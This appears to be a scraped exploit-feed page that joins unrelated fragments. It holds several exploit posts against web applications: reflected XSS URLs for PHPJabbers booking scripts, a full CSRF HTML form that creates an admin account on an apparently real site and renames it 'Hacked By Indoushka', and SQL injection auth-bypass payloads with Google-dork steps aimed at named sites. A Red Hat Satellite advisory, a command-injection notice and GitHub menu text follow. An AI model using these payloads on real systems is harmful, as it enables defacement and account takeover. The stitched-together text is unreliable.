PHPJabbers Taxi Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/taxi-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4116## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS][-] Done

PHPJabbers Taxi Booking 2.0 Cross Site Scripting

PHPJabbers Cleaning Business version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cleaning-business-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4115## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Cleaning Business 1.0 Cross Site Scripting

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script>    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCalendar 1.3 Cross Site Request Forgery

WebCoder CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : WebCoder CMS v1.0 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/webcoder-fully-customizable-cms/22745929                                               |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /%5c/faq[+]  https://cmswebcoderaz/%5c/faqGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCoder CMS 1.0 SQL Injection

WebCom CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WebCom CMS v1.0 Auth By pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : "Powered by Web.Com(India) Pvt. Ltd"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : admin'-- - & Pass : indoushka[+] http://winternationalhospcom/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCom CMS 1.0 SQL Injection

PHPJabbers Night Club Booking version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/night-club-booking-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4114## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Night Club Booking 1.0 Cross Site Scripting

PHPJabbers Service Booking Script version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/service-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4113## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Service Booking Script 1.0 Cross Site Scripting

PHPJabbers Availability Booking Calendar version 5.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Availability Booking Calendar 5.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/availability-booking-calendar/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4110## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'session_id' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=[XSS]&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0[-] Done

PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting

Updated Satellite 6.13 packages that fixes important security bugs and several
regular bugs are now available for Red Hat Satellite.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-40899: An issue discovered in Python Charmers Future 0.18.2 and earlier allows remote attackers to cause a denial of service via crafted Set-Cookie header from malicious web server.
* CVE-2023-0118: An arbitrary code execution flaw was found in Foreman. This flaw allows an admin user to bypass safe mode in templates and execute arbitrary code on the underlying operating system.


SRPM foreman-3.5.1.19-1.el8sat.src.rpm SHA-256: a5c024297bfc5dc0ff26a32a0b37b94b1ce99c5d045d6cf8eac2e57b4637f615 python-future-0.18.3-1.el8pc.src.rpm SHA-256: 4446f118efd8daf7503bfdd5041c2b7c58226e05478d7520679adf0a20e10bcb python-pulp-rpm-3.18.17-1.el8pc.src.rpm SHA-256: 647f853d0107f0510ad53196d6f66a7a769f42a1ae2e960042510750540dfab0 python-pulpcore-3.21.9-1.el8pc.src.rpm SHA-256: d4375f879fbc1696e70399b759b3fb7d0eb4d515ff3013dfaaf704dec2081e6c rubygem-fog-vsphere-3.6.2-1.el8sat.src.rpm SHA-256: e9a3d9bd619ca21c5d36d13221260a7caa221b9169da7dc2fc47fe4ad5ce2195 rubygem-foreman\_ansible-10.4.3-1.el8sat.src.rpm SHA-256: 4ad7354dc75bf49273a7bb9e7380b82a9174e44f9b6cf5b746124ff409a28430 rubygem-foreman\_maintain-1.2.11-1.el8sat.src.rpm SHA-256: 8dc4eb741e94ee8ba132e59425cf82809de4bdfd7b5c704682b682b70457a5dc rubygem-hammer\_cli\_foreman\_ansible-0.5.0-1.el8sat.src.rpm SHA-256: 3e69003275f72ea090baa49c17bc8e112c69450d1f2371519cd2ffac6772508b rubygem-katello-4.7.0.31-1.el8sat.src.rpm SHA-256: 8096f5b0b5c5d5d01b8d53964e7cf99e31692d7a8fb5a8eb17c1408bdbccc223 rubygem-safemode-1.3.8-1.el8sat.src.rpm SHA-256: 8848d88ff12c1122a7a2b63d95048f6252ce686f9431bbe9931a7a8c4771ebf5 satellite-6.13.3-1.el8sat.src.rpm SHA-256: dd913ae94429cb7b3bb3f87c594e8984a18567ca4b15fd2f57adf07721b8b843 x86\_64 foreman-3.5.1.19-1.el8sat.noarch.rpm SHA-256: bf7cad08326baaefe9d57f2074a44c0988af602cea32ba2cfcacc64d4f13456f foreman-cli-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 7fb8e7b68a455653e8688ddc0e9d9eb7fda9f2d1a9e96df2306b2e1d51fdade9 foreman-debug-3.5.1.19-1.el8sat.noarch.rpm SHA-256: d4ea94de0145eac8b1de8fae92114b2e49d641653c8ba9d09205b1af2cc5f5ee foreman-dynflow-sidekiq-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 2caa9d45e79bf9bacd31b71fde86b51fdcbbc7f4eeeb1b322e8868c307ecf1dd foreman-ec2-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 188e4ea3dde44f169d7439d805628ee40b86c4913d092dcbc1049fa44c2bb836 foreman-journald-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 3dbe2edad0e16f353e2ee0fadef68d49da6a8f3576aa68b8efed8998795f8f8f foreman-libvirt-3.5.1.19-1.el8sat.noarch.rpm SHA-256: acea3c4957ccae83fedf08b5b89dbda6c18b132ae1af52eae01aec17c1f9fd6f foreman-openstack-3.5.1.19-1.el8sat.noarch.rpm SHA-256: f75352df2499a25ccc594429d19b71286636b6eb6148f32ef28ea2d9a0d9a744 foreman-ovirt-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 70173277eee54b09fb1b446340ed8e2bfe07e1ba0312a07e059b19ba9620d454 foreman-postgresql-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 0c6d867d45f2d77002fbee3f07e915818b889b69a3c2b693a6f8700639c5ba15 foreman-service-3.5.1.19-1.el8sat.noarch.rpm SHA-256: ce0d2623caf69794d417910b8fdd4997081a79fdbfe308d2d3aa832920f4d350 foreman-telemetry-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 8475b99d8432188d3067a14c2436c06c34382247fa499d5af813e2e9a67b316c foreman-vmware-3.5.1.19-1.el8sat.noarch.rpm SHA-256: eaf545c1f1a99920df24a0d31f4eb9a6185abfe67ebf2483f12306ca37f505dd python39-future-0.18.3-1.el8pc.noarch.rpm SHA-256: f66fe6fa9545f5b4b1b7c7f456f812e942fdb621c1c9c61f12cbfbed16baecdb python39-pulp-rpm-3.18.17-1.el8pc.noarch.rpm SHA-256: a195c83c7d74b5b90c9b1792e5709f4ced8cee5da899af2cfe2d10eec4d5c9fa python39-pulpcore-3.21.9-1.el8pc.noarch.rpm SHA-256: fa7c51f31ecd3529c0bf79b01a7e3c0dc139986a6ceb3066b5b0b4e574df6d3d rubygem-fog-vsphere-3.6.2-1.el8sat.noarch.rpm SHA-256: 502b08443706bce4e30f44b8d642f4762cf08ff5c8ce2380d1b3277c1db2d08f rubygem-foreman\_ansible-10.4.3-1.el8sat.noarch.rpm SHA-256: 27a50896de50ef72ef0ea029c0d8dee0e0e7debc91ccb0bd0ec7543dc4301703 rubygem-foreman\_maintain-1.2.11-1.el8sat.noarch.rpm SHA-256: 5173b2edaec1bd7ed9e6e131000b650f36bf3ba93681b036a0c4484c5826e84d rubygem-hammer\_cli\_foreman\_ansible-0.5.0-1.el8sat.noarch.rpm SHA-256: b0cc4467fcca4f6e389289e3fa562d970603febc0bda98e2ed2c031460f1c22e rubygem-katello-4.7.0.31-1.el8sat.noarch.rpm SHA-256: 905da473bed31af7099d14b7d3679da7e6e7cbdbec68f52d78afb8e111111f8f rubygem-safemode-1.3.8-1.el8sat.noarch.rpm SHA-256: 423aed44c3ada5fa14161306afef1891a255576bd73f68122cbbd47f14cddfd5 satellite-6.13.3-1.el8sat.noarch.rpm SHA-256: 29938dec6329ad0b9c9e55cab1e537007d88e1810efb149b8f1b5eee42e8dbad satellite-cli-6.13.3-1.el8sat.noarch.rpm SHA-256: 52856719fb6b3fdcf50c241b95f10acf4f4034cae623a0d2d05c77aa088b5eff satellite-common-6.13.3-1.el8sat.noarch.rpm SHA-256: be12ffd34513b533c1c418402ba1f1e34397e99f15da048932bb5b2e10953014

SRPM foreman-3.5.1.19-1.el8sat.src.rpm SHA-256: a5c024297bfc5dc0ff26a32a0b37b94b1ce99c5d045d6cf8eac2e57b4637f615 rubygem-foreman\_maintain-1.2.11-1.el8sat.src.rpm SHA-256: 8dc4eb741e94ee8ba132e59425cf82809de4bdfd7b5c704682b682b70457a5dc rubygem-hammer\_cli\_foreman\_ansible-0.5.0-1.el8sat.src.rpm SHA-256: 3e69003275f72ea090baa49c17bc8e112c69450d1f2371519cd2ffac6772508b satellite-6.13.3-1.el8sat.src.rpm SHA-256: dd913ae94429cb7b3bb3f87c594e8984a18567ca4b15fd2f57adf07721b8b843 x86\_64 foreman-cli-3.5.1.19-1.el8sat.noarch.rpm SHA-256: 7fb8e7b68a455653e8688ddc0e9d9eb7fda9f2d1a9e96df2306b2e1d51fdade9 rubygem-foreman\_maintain-1.2.11-1.el8sat.noarch.rpm SHA-256: 5173b2edaec1bd7ed9e6e131000b650f36bf3ba93681b036a0c4484c5826e84d rubygem-hammer\_cli\_foreman\_ansible-0.5.0-1.el8sat.noarch.rpm SHA-256: b0cc4467fcca4f6e389289e3fa562d970603febc0bda98e2ed2c031460f1c22e satellite-cli-6.13.3-1.el8sat.noarch.rpm SHA-256: 52856719fb6b3fdcf50c241b95f10acf4f4034cae623a0d2d05c77aa088b5eff

RHSA-2023:4466: Red Hat Security Advisory: Satellite 6.13.3 Async Security Update

A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20230722 and classified as critical. This issue affects some unknown processing of the file importhtml.php. The manipulation of the argument sql leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#sql